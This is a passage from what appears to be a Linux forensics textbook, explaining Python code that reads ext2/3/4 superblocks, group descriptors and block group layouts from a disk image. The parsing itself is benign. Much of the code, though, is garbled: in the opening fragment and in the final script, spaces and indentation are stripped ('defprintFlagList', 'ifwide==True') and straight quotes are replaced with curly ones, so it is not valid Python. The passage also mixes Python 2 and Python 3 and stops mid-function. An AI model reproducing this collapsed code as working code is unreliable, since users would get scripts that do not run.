self.flags=getU16(data,0x12)
self.flagsList=self.printFlagList()
#/*Excludebitmapforsnapshots*/
self.excludeBitmapLo=getU32(data,0x14)
#/*crc32c(s_uuid+grp_num+bbitmap)LE*/
self.blockBitmapCsumLo=getU16(data,0x18)
#/*crc32c(s_uuid+grp_num+ibitmap)LE*/
self.inodeBitmapCsumLo=getU16(data,0x1a)
#/*Unusedinodescount*/
self.itableUnusedLo=getU16(data,0x1c)
#/*crc16(sb_uuid+group+desc)*/
self.checksum=getU16(data,0x1e)
ifwide==True:
#/*BlocksbitmapblockMSB*/
self.blockBitmapHi=getU32(data,0x20)
#/*InodesbitmapblockMSB*/
self.inodeBitmapHi=getU32(data,0x24)
#/*InodestableblockMSB*/
self.inodeTableHi=getU32(data,0x28)
#/*FreeblockscountMSB*/
self.freeBlocksCountHi=getU16(data,0x2c)
#/*FreeinodescountMSB*/
self.freeInodesCountHi=getU16(data,0x2e)
#/*DirectoriescountMSB*/
self.usedDirsCountHi=getU16(data,0x30)
#/*UnusedinodescountMSB*/
self.itableUnusedHi=getU16(data,0x32)
#/*ExcludebitmapblockMSB*/
self.excludeBitmapHi=getU32(data,0x34)
#/*crc32c(s_uuid+grp_num+bbitmap)BE*/
self.blockBitmapCsumHi=getU16(data,0x38)
#/*crc32c(s_uuid+grp_num+ibitmap)BE*/
self.inodeBitmapCsumHi=getU16(data,0x3a)
self.reserved=getU32(data,0x3c)
defprintFlagList(self):
flagList=[]
#inodetableandbitmaparenotinitialized(EXT4_BG_INODE_UNINIT).
ifself.flags&0x1:
flagList.append(‘InodeUninitialized’)
#blockbitmapisnotinitialized(EXT4_BG_BLOCK_UNINIT).
ifself.flags&0x2:
flagList.append(‘BlockUninitialized’)
#inodetableiszeroed(EXT4_BG_INODE_ZEROED).
ifself.flags&0x4:
flagList.append(‘InodeZeroed’)
returnflagList
defprettyPrint(self):
fork,vinsorted(self.__dict__.iteritems()):
printk+”:”,v
This new class is straightforward. Note that the constructor takes an optional parameter which is used to indicate if 64-bit mode is being used. GroupDescriptor defines a prettyPrint function similar to the one found in Superblock.
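For readers who want to experiment with the descriptor format, the following sketch unpacks just the first three fields of a descriptor in a single struct.unpack call. The function name parse_descriptor_head and the sample block numbers are hypothetical; the field offsets (0, 4, and 8) match the GroupDescriptor constructor above.

```python
import struct

def parse_descriptor_head(data):
    """Unpack the first three 32-bit fields of a group descriptor."""
    # '<LLL' = three little-endian unsigned 32-bit values at offsets 0, 4, 8
    block_bitmap, inode_bitmap, inode_table = struct.unpack("<LLL", data[0:12])
    return {"blockBitmapLo": block_bitmap,
            "inodeBitmapLo": inode_bitmap,
            "inodeTableLo": inode_table}

# hypothetical 32-byte descriptor: bitmaps in blocks 1025 and 1041,
# inode table starting at block 1057, remaining fields zeroed
sample = struct.pack("<LLL", 1025, 1041, 1057) + b"\x00" * 20
print(parse_descriptor_head(sample))
```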
On its own the GroupDescriptor class isn't terribly useful. The main reason for this is that data is required from the superblock to locate, read, and interpret group descriptors. I have created a new class called ExtMetadata (for extended metadata) that combines information from the superblock and the block group descriptors in order to solve this problem. The code for this new class follows.
class ExtMetadata():
    def __init__(self, filename, offset):
        # read first sector
        if not os.path.isfile(str(filename)):
            print("File " + str(filename) + " cannot be opened for reading")
            exit(1)
        with open(str(filename), 'rb') as f:
            f.seek(1024 + int(offset) * 512)
            sbRaw = str(f.read(1024))
        self.superblock = Superblock(sbRaw)
        # read block group descriptors
        self.blockGroups = self.superblock.blockGroups()
        if self.superblock.descriptorSize != 0:
            self.wideBlockGroups = True
            self.blockGroupDescriptorSize = 64
        else:
            self.wideBlockGroups = False
            self.blockGroupDescriptorSize = 32
        # read in group descriptors starting in block 1
        with open(str(filename), 'rb') as f:
            f.seek(int(offset) * 512 + self.superblock.blockSize)
            bgdRaw = str(f.read(self.blockGroups * \
                self.blockGroupDescriptorSize))
        self.bgdList = []
        for i in range(0, self.blockGroups):
            bgd = GroupDescriptor(bgdRaw[i * self.blockGroupDescriptorSize:], \
                self.wideBlockGroups)
            self.bgdList.append(bgd)

    def prettyPrint(self):
        self.superblock.prettyPrint()
        i = 0
        for bgd in self.bgdList:
            print "Block group:" + str(i)
            bgd.prettyPrint()
            print ""
            i += 1
The constructor for this class now contains the code from main() in our previous script that is used to read the superblock from the disk image file. The reason for this is that we need the superblock information in order to know how much data to read when retrieving the group descriptors from the image file.
The constructor first reads the superblock, then creates a Superblock object, uses the information from the superblock to calculate the size of the group descriptor table, reads the group descriptor table, and passes the data to the GroupDescriptor constructor in order to build a list of GroupDescriptor objects (inside the for loop).
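The slicing step inside the for loop can be sketched separately. In the example below, which assumes Python 3, the function split_descriptor_table and the fabricated three-entry table are illustrative only. Unlike the constructor above, which passes everything from the start of a descriptor to the end of the table, this sketch cuts out exactly one record per group.

```python
def split_descriptor_table(table, count, size):
    """Cut a raw group descriptor table into per-group records."""
    # group i occupies bytes [i*size, (i+1)*size) of the table
    return [table[i * size:(i + 1) * size] for i in range(count)]

# hypothetical table: three 32-byte descriptors filled with 0, 1 and 2
table = b"".join(bytes([n]) * 32 for n in range(3))
records = split_descriptor_table(table, 3, 32)
print([len(r) for r in records])
```

Both approaches give the same parsed values because the descriptor constructor only reads fixed offsets from the start of the data it is handed.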
The new main() function below has become very simple. It just checks for the existence of the image file, calls the ExtMetadata constructor, and then uses the ExtMetadata.prettyPrint function to print the results.
def usage():
    print("usage " + sys.argv[0] + \
        " <imagefile> <offset in sectors>\n" + \
        "Reads superblock & group descriptors from an image file")
    exit(1)

def main():
    if len(sys.argv) < 3:
        usage()
    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    emd = ExtMetadata(sys.argv[1], sys.argv[2])
    emd.prettyPrint()

if __name__ == "__main__":
    main()
Partial output for this new script is shown in Figure 7.12. At this point our ExtMetadata class is very basic. We will expand this class in the next section.
FIGURE 7.12
Partial output from a script that parses the block group descriptor table.
Combining superblock and group descriptor information
Up until this point we have treated the superblock and group descriptors separately. In the last section we used the information from the superblock to locate the group descriptors, but that was the extent to which we combined information from these two items. In this section we will extend the classes introduced previously in this chapter and add a new class which will allow us to determine the layout of an extended filesystem. We will start at the beginning of the script and work our way toward the end describing anything that is new or changed. Note that unlike most scripts in this book, I will talk about the changes and present the complete script at the end of this section. Given the large number of changes, this seems to make more sense for this script.
The first change is the addition of a new import statement, from math import log. This is a different form of import from what has been used thus far. This import only pulls in part of the math module. The log function will be used in some of the new code in the script.
A number of new functions have been added. Two convenience functions for determining the number of block groups and the group descriptor size are among the new functions. Their code follows.
    def blockGroups(self):
        bg = self.totalBlocks / self.blocksPerGroup
        if self.totalBlocks % self.blocksPerGroup != 0:
            bg += 1
        return bg

    def groupDescriptorSize(self):
        if '64-bit' in self.incompatibleFeaturesList:
            return 64
        else:
            return 32
The blockGroups function divides the total blocks by blocks-per-group using integer division. Integer division is what you learned back in grammar school where the answer was always an integer with possibly a remainder if things didn't divide evenly. The next line uses the modulus (%) operator. The modulus is the remainder you get from integer division. For example, 7 % 3 is 1 because 7 / 3 using integer division is 2 remainder 1. The line if self.totalBlocks % self.blocksPerGroup != 0: effectively says "if the total number of blocks is not a multiple of the blocks per group, add one to the number of block groups to account for the last (smaller) block group."
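The rounding-up behavior is easy to verify with a few numbers. The standalone function below is a sketch of the same calculation for Python 3, where integer division must be requested explicitly with the // operator; the name block_groups and the sample block counts are assumptions for this example.

```python
def block_groups(total_blocks, blocks_per_group):
    """Number of block groups, counting a final partial group."""
    groups = total_blocks // blocks_per_group
    # a nonzero remainder means one extra, smaller group at the end
    if total_blocks % blocks_per_group != 0:
        groups += 1
    return groups

print(block_groups(65536, 32768))
print(block_groups(65537, 32768))
```

With 32768 blocks per group, 65536 blocks fill two groups exactly, while a single additional block forces a third group.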
The following new convenience functions for the Superblock class are straightforward. They are used to determine one quantity from another, such as getting the block group number from an inode or data block number, etc.
    def groupStartBlock(self, bgNo):
        return self.blocksPerGroup * bgNo

    def groupEndBlock(self, bgNo):
        return self.groupStartBlock(bgNo + 1) - 1

    def groupStartInode(self, bgNo):
        return self.inodesPerGroup * bgNo + 1

    def groupEndInode(self, bgNo):
        return self.inodesPerGroup * (bgNo + 1)

    def groupFromBlock(self, blockNo):
        return blockNo / self.blocksPerGroup

    def groupIndexFromBlock(self, blockNo):
        return blockNo % self.blocksPerGroup

    def groupFromInode(self, inodeNo):
        return (inodeNo - 1) / self.inodesPerGroup

    def groupIndexFromInode(self, inodeNo):
        return (inodeNo - 1) % self.inodesPerGroup
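Inode numbers start at one rather than zero, which is why the inode functions above subtract one before dividing. The sketch below shows the mapping in both directions. It is written for Python 3; the constant INODES_PER_GROUP and the function inode_from_group_index are hypothetical additions for illustration and do not appear in the script.

```python
INODES_PER_GROUP = 8192  # hypothetical value for this example

def group_from_inode(inode_no):
    # inode 1 is the first inode of group 0, hence the -1
    return (inode_no - 1) // INODES_PER_GROUP

def index_from_inode(inode_no):
    # zero-based position of the inode within its group's inode table
    return (inode_no - 1) % INODES_PER_GROUP

def inode_from_group_index(group, index):
    # inverse mapping: rebuild the inode number from (group, index)
    return group * INODES_PER_GROUP + index + 1

for ino in (1, 8192, 8193):
    print(ino, group_from_inode(ino), index_from_inode(ino))
```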
The final addition to the Superblock class is the function groupHasSuperblock. If you pass this function a block group number it will tell you (okay, not literally tell you, but it will return a value) if that block group contains a superblock based on the features in use. The code for this function follows.
    def groupHasSuperblock(self, bgNo):
        # block group zero always has a superblock
        if bgNo == 0:
            return True
        retVal = False
        if 'MetaBlockGroups' in self.incompatibleFeaturesList and \
            bgNo >= self.firstMetaBlockGroup:
            # meta block groups have a sb and gdt in 1st and
            # 2nd and last of each meta group
            # meta block group size is blocksize/32
            # only part of filesystem might use this feature
            mbgSize = self.blockSize / 32
            retVal = (bgNo % mbgSize == 0) or \
                ((bgNo + 1) % mbgSize == 0) or \
                ((bgNo - 1) % mbgSize == 0)
        elif 'SparseSuper2' in self.compatibleFeaturesList:
            # two backup superblocks in self.backupBlockGroups
            if bgNo == self.backupBlockGroups[0] or \
                bgNo == self.backupBlockGroups[1]:
                retVal = True
        elif 'SparseSuper' in self.readOnlyCompatibleFeaturesList:
            # backups in 1, powers of 3, 5, and 7
            retVal = (bgNo == 1) or \
                (bgNo == pow(3, round(log(bgNo) / log(3)))) \
                or (bgNo == pow(5, round(log(bgNo) / log(5)))) \
                or (bgNo == pow(7, round(log(bgNo) / log(7))))
            if retVal:
                return retVal
        else:
            # if we got this far we must have default
            # with every bg having sb and gdt
            retVal = True
        return retVal
This function is primarily a big if/elif/else block. It begins with a check to see whether the block group number is zero. If so, it immediately returns True because there is always a superblock in the first group.
Next we check for the Meta Block Groups feature. Recall that this feature breaks up the filesystem into meta groups. The meta groups are like little logical filesystems in that the group descriptors only pertain to block groups within the meta group. This allows larger filesystems to be created. When this feature is enabled, there is a superblock and group descriptor table in the first, second and last block groups within the meta group. The meta groups always have a size of blocksize/32. Also, the meta block group may only apply to part of the disk, so a check is made to ensure that we are in the region where meta groups exist.
Next, we check for the Sparse Super 2 feature. This feature stores backup superblocks in two groups listed in the superblock. The next check is for the Sparse Super feature. If this feature is in use, the backup superblocks are in group 1 and groups that are powers of 3, 5, or 7. This is where the logarithm function imported earlier comes in. For any number n that is an exact integer power of x, x raised to the power round(log(n)/log(x)) should equal n.
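The same test can be made without floating point at all. The sketch below is an alternative to the logarithm approach used in the script, not the script's own method: it repeatedly divides by the base and checks whether the result reaches one. The function names are assumptions for this example, which is written for Python 3.

```python
def is_power_of(n, base):
    """True if n == base**k for some integer k >= 1."""
    if n < base:
        return False
    # strip factors of base; an exact power reduces to exactly 1
    while n % base == 0:
        n //= base
    return n == 1

def sparse_super_backup(bg_no):
    # backups live in group 1 and in groups that are powers of 3, 5, or 7
    return bg_no == 1 or any(is_power_of(bg_no, b) for b in (3, 5, 7))

backups = [g for g in range(1, 60) if sparse_super_backup(g)]
print(backups)
```

Integer-only arithmetic sidesteps any concern about rounding in log for very large group numbers, at the cost of a short loop.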
The GroupDescriptor class is unchanged apart from recording the wide flag in self.wide, which the new class relies on. We add a new class, ExtendedGroupDescriptor, which combines information from our superblock with group descriptors to more fully describe the block group. This new class adds layout information to what is found in the generic GroupDescriptor class. Some might question why I chose not to have the ExtendedGroupDescriptor class inherit from (or extend) the GroupDescriptor class. The primary reason I did not do so is that the GroupDescriptor class is little more than a structure for storing raw data found on the disk, whereas the ExtendedGroupDescriptor has more meaningful data members that are derived from the raw values. The code for this new class follows.
class ExtendedGroupDescriptor():
    def __init__(self, bgd, sb, bgNo):
        self.blockGroup = bgNo
        self.startBlock = sb.groupStartBlock(bgNo)
        self.endBlock = sb.groupEndBlock(bgNo)
        self.startInode = sb.groupStartInode(bgNo)
        self.endInode = sb.groupEndInode(bgNo)
        self.flags = bgd.printFlagList()
        self.freeInodes = bgd.freeInodesCountLo
        if bgd.wide:
            self.freeInodes += bgd.freeInodesCountHi * pow(2, 16)
        self.freeBlocks = bgd.freeBlocksCountLo
        if bgd.wide:
            self.freeBlocks += bgd.freeBlocksCountHi * pow(2, 16)
        self.directories = bgd.usedDirsCountLo
        if bgd.wide:
            self.directories += bgd.usedDirsCountHi * pow(2, 16)
        self.checksum = bgd.checksum
        self.blockBitmapChecksum = bgd.blockBitmapCsumLo
        if bgd.wide:
            self.blockBitmapChecksum += bgd.blockBitmapCsumHi * pow(2, 16)
        self.inodeBitmapChecksum = bgd.inodeBitmapCsumLo
        if bgd.wide:
            self.inodeBitmapChecksum += bgd.inodeBitmapCsumHi * pow(2, 16)
        # now figure out the layout and store it in a list (with lists inside)
        self.layout = []
        self.nonDataBlocks = 0
        # for flexible block groups must make an adjustment
        fbgAdj = 1
        if 'FlexibleBlockGroups' in sb.incompatibleFeaturesList:
            # only first group in flex block affected
            if bgNo % sb.groupsPerFlex == 0:
                fbgAdj = sb.groupsPerFlex
        if sb.groupHasSuperblock(bgNo):
            self.layout.append(['Superblock', self.startBlock, \
                self.startBlock])
            gdSize = sb.groupDescriptorSize() * sb.blockGroups() / \
                sb.blockSize
            self.layout.append(['Group Descriptor Table', \
                self.startBlock + 1, self.startBlock + gdSize])
            self.nonDataBlocks += gdSize + 1
            if sb.reservedGdtBlocks > 0:
                self.layout.append(['Reserved GDT Blocks', \
                    self.startBlock + gdSize + 1, \
                    self.startBlock + gdSize + sb.reservedGdtBlocks])
                self.nonDataBlocks += sb.reservedGdtBlocks
        bbm = bgd.blockBitmapLo
        if bgd.wide:
            bbm += bgd.blockBitmapHi * pow(2, 32)
        self.layout.append(['Data Block Bitmap', bbm, bbm])
        # is block bitmap in this group (not flex block group, etc)
        if sb.groupFromBlock(bbm) == bgNo:
            self.nonDataBlocks += fbgAdj
        ibm = bgd.inodeBitmapLo
        if bgd.wide:
            ibm += bgd.inodeBitmapHi * pow(2, 32)
        self.layout.append(['Inode Bitmap', ibm, ibm])
        # is inode bitmap in this group?
        if sb.groupFromBlock(ibm) == bgNo:
            self.nonDataBlocks += fbgAdj
        it = bgd.inodeTableLo
        if bgd.wide:
            it += bgd.inodeTableHi * pow(2, 32)
        itBlocks = (sb.inodesPerGroup * sb.inodeSize) / sb.blockSize
        self.layout.append(['Inode Table', it, it + itBlocks - 1])
        # is inode table in this group?
        if sb.groupFromBlock(it) == bgNo:
            self.nonDataBlocks += itBlocks * fbgAdj
        self.layout.append(['Data Blocks', self.startBlock \
            + self.nonDataBlocks, self.endBlock])

    def prettyPrint(self):
        print ""
        print 'Block Group: ' + str(self.blockGroup)
        print 'Flags: %r' % self.flags
        print 'Blocks: %s - %s' % (self.startBlock, self.endBlock)
        print 'Inodes: %s - %s' % (self.startInode, self.endInode)
        print 'Layout:'
        for item in self.layout:
            print '%s %s - %s' % (item[0], item[1], item[2])
        print 'Free Inodes: %u' % self.freeInodes
        print 'Free Blocks: %u' % self.freeBlocks
        print 'Directories: %u' % self.directories
        print 'Checksum: 0x%x' % self.checksum
        print 'Block Bitmap Checksum: 0x%x' % self.blockBitmapChecksum
        print 'Inode Bitmap Checksum: 0x%x' % self.inodeBitmapChecksum
There are a few things in the constructor that might require some explanation. You will see lines that read if bgd.wide: following an assignment, where if the statement is true (wide or 64-bit mode in use), another value multiplied by 2^16 or 2^32 is added to the newly assigned value. This allows the raw values stored in two fields of the group descriptors for 64-bit filesystems to be stored properly in a single value.
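The joining of low and high halves can be reduced to a single helper, sketched here for Python 3. The function name combine and its parameters are assumptions for illustration; the multipliers correspond to the 16-bit counters and 32-bit block addresses described above.

```python
def combine(lo, hi, lo_bits, wide):
    """Join the low and high halves of a split descriptor field."""
    if not wide:
        # 32-byte descriptors have no high half to add
        return lo
    # shift the high half above the low half: hi * 2^lo_bits
    return lo + hi * (2 ** lo_bits)

# a 16-bit counter pair and a 32-bit block address pair (made-up values)
print(hex(combine(0x1234, 0x1, 16, True)))
print(combine(5, 2, 32, True))
```

Multiplying by a power of two is equivalent to a left shift, so hi << lo_bits would work just as well.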
Recall that while certain block groups may be missing some items, the item order of what is present is always superblock, group descriptor table, reserved group descriptor blocks, data block bitmap, inode bitmap, inode table, and data blocks. Before building a list called layout, which is a list of lists containing a descriptor, start block, and end block, the constructor checks for the Flexible Block Groups feature.
As a reminder, this feature allows the metadata from a flexible group to be stored in the first block group within the flex group. Because the first block group stores all the group descriptors, bitmaps, and inodes for the entire flex group, an adjustment factor, fbgAdj, is set to the number of groups in a flex group in order to add the correct number of blocks to the layout of the block group. The modulus (%) operator is used in this constructor to determine whether we are at the beginning of a flexible group. Once you understand the flexible block group adjustment calculation, the constructor becomes easy to understand.
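A short calculation may make the adjustment more concrete. The sketch below, for Python 3, isolates the two pieces of arithmetic involved; the function names and the sample geometry (8192 inodes per group, 256-byte inodes, 4096-byte blocks, 16 groups per flex group) are assumptions chosen for illustration.

```python
def flex_adjustment(bg_no, groups_per_flex, flex_enabled):
    """Multiplier applied to metadata sizes for a given block group."""
    # only the first group of each flex group holds the pooled metadata
    if flex_enabled and bg_no % groups_per_flex == 0:
        return groups_per_flex
    return 1

def inode_table_blocks(inodes_per_group, inode_size, block_size):
    # blocks needed for one group's inode table
    return (inodes_per_group * inode_size) // block_size

per_group = inode_table_blocks(8192, 256, 4096)
first_group = per_group * flex_adjustment(0, 16, True)
print(per_group, first_group)
```

Under these assumed values, one inode table takes 512 blocks, so the first group of a flex group carries 8192 blocks of inode tables.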
The prettyPrint function in the ExtendedGroupDescriptor class is straightforward. As mentioned earlier in this book, The Sleuth Kit seems to be a bit out of date. We have seen features that it does not report. It also will not report the two bitmap checksums at the end of the prettyPrint function in the ExtendedGroupDescriptor class. The only remaining change to our script is to modify the ExtMetadata class to store ExtendedGroupDescriptors instead of GroupDescriptors. The final version of this script follows.
#!/usr/bin/python
#
#extfs.py
#
#ThisisasimplePythonscriptthatwill
#getmetadatafromanext2/3/4filesysteminside
#ofanimagefile.
#
#DevelopedforPentesterAcademy
#byDr.PhilPolstra(@ppolstra)
importsys
importos.path
importsubprocess
importstruct
importtime
frommathimportlog
#thesearesimplefunctionstomakeconversionseasier
defgetU32(data,offset=0):
returnstruct.unpack(‘<L’,data[offset:offset+4])[0]
defgetU16(data,offset=0):
returnstruct.unpack(‘<H’,data[offset:offset+2])[0]
defgetU8(data,offset=0):
returnstruct.unpack(‘B’,data[offset:offset+1])[0]
defgetU64(data,offset=0):
returnstruct.unpack(‘<Q’,data[offset:offset+8])[0]
#thisfunctiondoesn’tunpackthestringbecause
#itisn’treallyanumberbutaUUID
defgetU128(data,offset=0):
returndata[offset:offset+16]
defprintUuid(data):
retStr=format(struct.unpack(‘<Q’,data[8:16])[0],\
‘X’).zfill(16)+\
format(struct.unpack(‘<Q’,data[0:8])[0],‘X’).zfill(16)
returnretStr
defgetCompatibleFeaturesList(u32):
retList=[]
ifu32&0x1:
retList.append(‘DirectoryPreallocate’)
ifu32&0x2:
retList.append(‘ImagicInodes’)
ifu32&0x4:
retList.append(‘HasJournal’)
ifu32&0x8:
retList.append(‘ExtendedAttributes’)
ifu32&0x10:
retList.append(‘ResizeInode’)
ifu32&0x20:
retList.append(‘DirectoryIndex’)
ifu32&0x40:
retList.append(‘LazyBlockGroups’)
ifu32&0x80:
retList.append(‘ExcludeInode’)
ifu32&0x100:
retList.append(‘ExcludeBitmap’)
ifu32&0x200:
retList.append(‘SparseSuper2’)
returnretList
defgetIncompatibleFeaturesList(u32):
retList=[]
ifu32&0x1:
retList.append(‘Compression’)
ifu32&0x2:
retList.append(‘Filetype’)
ifu32&0x4:
retList.append(‘Recover’)
ifu32&0x8:
retList.append(‘JournalDevice’)
ifu32&0x10:
retList.append(‘MetaBlockGroups’)
ifu32&0x40:
retList.append(‘Extents’)
ifu32&0x80:
retList.append(‘64-bit’)
ifu32&0x100:
retList.append(‘MultipleMountProtection’)
ifu32&0x200:
retList.append(‘FlexibleBlockGroups’)
ifu32&0x400:
retList.append(‘ExtendedAttributesinInodes’)
ifu32&0x1000:
retList.append(‘DirectoryData’)
ifu32&0x2000:
retList.append(‘BlockGroupMetadataChecksum’)
ifu32&0x4000:
retList.append(‘LargeDirectory’)
ifu32&0x8000:
retList.append(‘InlineData’)
ifu32&0x10000:
retList.append(‘EncryptedInodes’)
returnretList
def getReadonlyCompatibleFeaturesList(u32):
    retList = []
    if u32 & 0x1:
        retList.append('SparseSuper')
    if u32 & 0x2:
        retList.append('LargeFile')
    if u32 & 0x4:
        retList.append('BtreeDirectory')
    if u32 & 0x8:
        retList.append('HugeFile')
    if u32 & 0x10:
        retList.append('GroupDescriptorTableChecksum')
    if u32 & 0x20:
        retList.append('DirectoryNlink')
    if u32 & 0x40:
        retList.append('ExtraIsize')
    if u32 & 0x80:
        retList.append('HasSnapshot')
    if u32 & 0x100:
        retList.append('Quota')
    if u32 & 0x200:
        retList.append('BigAlloc')
    if u32 & 0x400:
        retList.append('MetadataChecksum')
    if u32 & 0x800:
        retList.append('Replica')
    if u32 & 0x1000:
        retList.append('Read-only')
    return retList
“””
Thisclasswillparsethedatainasuperblock
fromanextended(ext2/ext3/ext4)Linuxfilesystem.
ItisuptodateasofJuly2015.
Usage:sb.Superblock(data)where
dataisapackedstringatleast1024bytes
longthatcontainsasuperblockinthefirst1024bytes.
sb.prettyPrint()printsoutallfieldsinthesuperblock.
“””
classSuperblock():
def__init__(self,data):
self.totalInodes=getU32(data)
self.totalBlocks=getU32(data,4)
self.restrictedBlocks=getU32(data,8)
self.freeBlocks=getU32(data,0xc)
self.freeInodes=getU32(data,0x10)
#normally0unlessblocksizeis<4k
self.firstDataBlock=getU32(data,0x14)
#blocksizeis1024*2^(whateverisinthisfield)
self.blockSize=pow(2,10+getU32(data,0x18))
#onlyusedifbigallocfeatureenabled
self.clusterSize=pow(2,getU32(data,0x1c))
self.blocksPerGroup=getU32(data,0x20)
#onlyusedifbigallocfeatureenabled
self.clustersPerGroup=getU32(data,0x24)
self.inodesPerGroup=getU32(data,0x28)
self.mountTime=time.gmtime(getU32(data,0x2c))
self.writeTime=time.gmtime(getU32(data,0x30))
#mountssincelastfsck
self.mountCount=getU16(data,0x34)
#mountsbetweenfsck
self.maxMountCount=getU16(data,0x36)
#shouldbe0xef53
self.magic=getU16(data,0x38)
#0001/0002/0004=cleanlyunmounted/errors/orphans
self.state=getU16(data,0x3a)
#whenerrors1/2/3continue/read-only/panic
self.errors=getU16(data,0x3c)
self.minorRevision=getU16(data,0x3e)
#lastfscktime
self.lastCheck=time.gmtime(getU32(data,0x40))
#secondsbetweenchecks
self.checkInterval=getU32(data,0x44)
#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites
self.creatorOs=getU32(data,0x48)
#0/1original/v2withdynamicinodesizes
self.revisionLevel=getU32(data,0x4c)
#UIDforreservedblocks
self.defaultResUid=getU16(data,0x50)
#GIDforreservedblocks
self.defaultRegGid=getU16(data,0x52)
#forExt4dynamicrevisionLevelsuperblocksonly!
#firstnon-reservedinode
self.firstInode=getU32(data,0x54)
#inodesizeinbytes
self.inodeSize=getU16(data,0x58)
#blockgroupthissuperblockisin
self.blockGroupNumber=getU16(data,0x5a)
#compatiblefeatures
self.compatibleFeatures=getU32(data,0x5c)
self.compatibleFeaturesList=\
getCompatibleFeaturesList(self.compatibleFeatures)
#incompatiblefeatures
self.incompatibleFeatures=getU32(data,0x60)
self.incompatibleFeaturesList=\
getIncompatibleFeaturesList(self.incompatibleFeatures)
#read-onlycompatiblefeatures
self.readOnlyCompatibleFeatures=getU32(data,0x64)
self.readOnlyCompatibleFeaturesList=\
getReadonlyCompatibleFeaturesList(self.readOnlyCompatibleFeatures)
#UUIDforvolumeleftasapackedstring
self.uuid=getU128(data,0x68)
#volumename-likelyempty
self.volumeName=data[0x78:0x88].split(“\x00”)[0]
#directorywherelastmounted
self.lastMounted=data[0x88:0xc8].split(“\x00”)[0]
#usedwithcompression
self.algorithmUsageBitmap=getU32(data,0xc8)
#notusedinext4
self.preallocBlocks=getU8(data,0xcc)
#onlyusedwithDIR_PREALLOCfeature
self.preallocDirBlock=getU8(data,0xcd)
#blocksreservedforfutureexpansion
self.reservedGdtBlocks=getU16(data,0xce)
#UUIDofjournalsuperblock
self.journalUuid=getU128(data,0xd0)
#inodenumberofjournalfile
self.journalInode=getU32(data,0xe0)
#devicenumberforjournalifexternaljournalused
self.journalDev=getU32(data,0xe4)
#startoflistoforphanedinodestodelete
self.lastOrphan=getU32(data,0xe8)
self.hashSeed=[]
#htreehashseed
self.hashSeed.append(getU32(data,0xec))
self.hashSeed.append(getU32(data,0xf0))
self.hashSeed.append(getU32(data,0xf4))
self.hashSeed.append(getU32(data,0xf8))
#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea
self.hashVersion=getU8(data,0xfc)
self.journalBackupType=getU8(data,0xfd)
#groupdescriptorsizeif64-bitfeatureenabled
self.descriptorSize=getU16(data,0xfe)
self.defaultMountOptions=getU32(data,0x100)
#onlyusedwithmetabgfeature
self.firstMetaBlockGroup=getU32(data,0x104)
#whenwasthefilesystemcreated
self.mkfsTime=time.gmtime(getU32(data,0x108))
self.journalBlocks=[]
#backupcopyofjournalinodesandsizeinlasttwoelements
foriinrange(0,17):
self.journalBlocks.append(getU32(data,0x10c+i*4))
#for64-bitmodeonly
self.blockCountHi=getU32(data,0x150)
self.reservedBlockCountHi=getU32(data,0x154)
self.freeBlocksHi=getU32(data,0x158)
#allinodessuchhaveatleastthismuchspace
self.minInodeExtraSize=getU16(data,0x15c)
#newinodesshouldreservethismanybytes
self.wantInodeExtraSize=getU16(data,0x15e)
#1/2/4signedhash/unsignedhash/testcode
self.miscFlags=getU32(data,0x160)
#logicalblocksreadfromdiskinRAIDbeforemovingtonextdisk
self.raidStride=getU16(data,0x164)
#secondstowaitbetweenmulti-mountchecks
self.mmpInterval=getU16(data,0x166)
#blocknumberforMMPdata
self.mmpBlock=getU64(data,0x168)
#howmanyblocksread/writetillbackonthisdisk
self.raidStripeWidth=getU32(data,0x170)
#groupsperflexgroup
self.groupsPerFlex=pow(2,getU8(data,0x174))
#shouldbe1forcrc32
self.metadataChecksumType=getU8(data,0x175)
#shouldbezeroes
self.reservedPad=getU16(data,0x176)
#kilobyteswrittenforalltime
self.kilobytesWritten=getU64(data,0x178)
#inodeofactivesnapshot
self.snapshotInode=getU32(data,0x180)
#idoftheactivesnapshot
self.snapshotId=getU32(data,0x184)
#blocksreservedforsnapshot
self.snapshotReservedBlocks=getU64(data,0x188)
#inodenumberofheadofsnapshotlist
self.snapshotList=getU32(data,0x190)
self.errorCount=getU32(data,0x194)
#timefirsterrordetected
self.firstErrorTime=time.gmtime(getU32(data,0x198))
#guiltyinode
self.firstErrorInode=getU32(data,0x19c)
#guiltyblock
self.firstErrorBlock=getU64(data,0x1a0)
#guiltyfunction
self.firstErrorFunction=\
data[0x1a8:0x1c8].split(“\x00”)[0]
#linenumberwhereerroroccurred
self.firstErrorLine=getU32(data,0x1c8)
#timelasterrordetected
self.lastErrorTime=time.gmtime(getU32(data,0x1cc))
#guiltyinode
self.lastErrorInode=getU32(data,0x1d0)
#linenumberwhereerroroccurred
self.lastErrorLine=getU32(data,0x1d4)
#guiltyblock
self.lastErrorBlock=getU64(data,0x1d8)
#guiltyfunction
self.lastErrorFunction=\
data[0x1e0:0x200].split(“\x00”)[0]
#mountoptionsinnull-terminatedstring
self.mountOptions=\
data[0x200:0x240].split(“\x00”)[0]
#inodeofuserquotafile
self.userQuotaInode=getU32(data,0x240)
#inodeofgroupquotafile
self.groupQuotaInode=getU32(data,0x244)
#shouldbezero
self.overheadBlocks=getU32(data,0x248)
#supersparse2only
self.backupBlockGroups=\
[getU32(data,0x24c),getU32(data,0x250)]
self.encryptionAlgorithms=[]
foriinrange(0,4):
self.encryptionAlgorithms.append(\
getU32(data,0x254+i*4))
self.checksum=getU32(data,0x3fc)
defblockGroups(self):
bg=self.totalBlocks/self.blocksPerGroup
ifself.totalBlocks%self.blocksPerGroup!=0:
bg+=1
returnbg
defgroupDescriptorSize(self):
if‘64-bit’inself.incompatibleFeaturesList:
return64
else:
return32
defprintState(self):
#0001/0002/0004=cleanlyunmounted/errors/orphans
retVal=“Unknown”
ifself.state==1:
retVal=“Cleanlyunmounted”
elifself.state==2:
retVal=“Errorsdetected”
elifself.state==4:
retVal=“Orphansbeingrecovered”
returnretVal
defprintErrorBehavior(self):
#whenerrors1/2/3continue/read-only/panic
retVal=“Unknown”
ifself.errors==1:
retVal=“Continue”
elifself.errors==2:
retVal=“Remountread-only”
elifself.errors==3:
retVal=“Kernelpanic”
returnretVal
defprintCreator(self):
#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites
retVal=“Unknown”
ifself.creatorOs==0:
retVal=“Linux”
elifself.creatorOs==1:
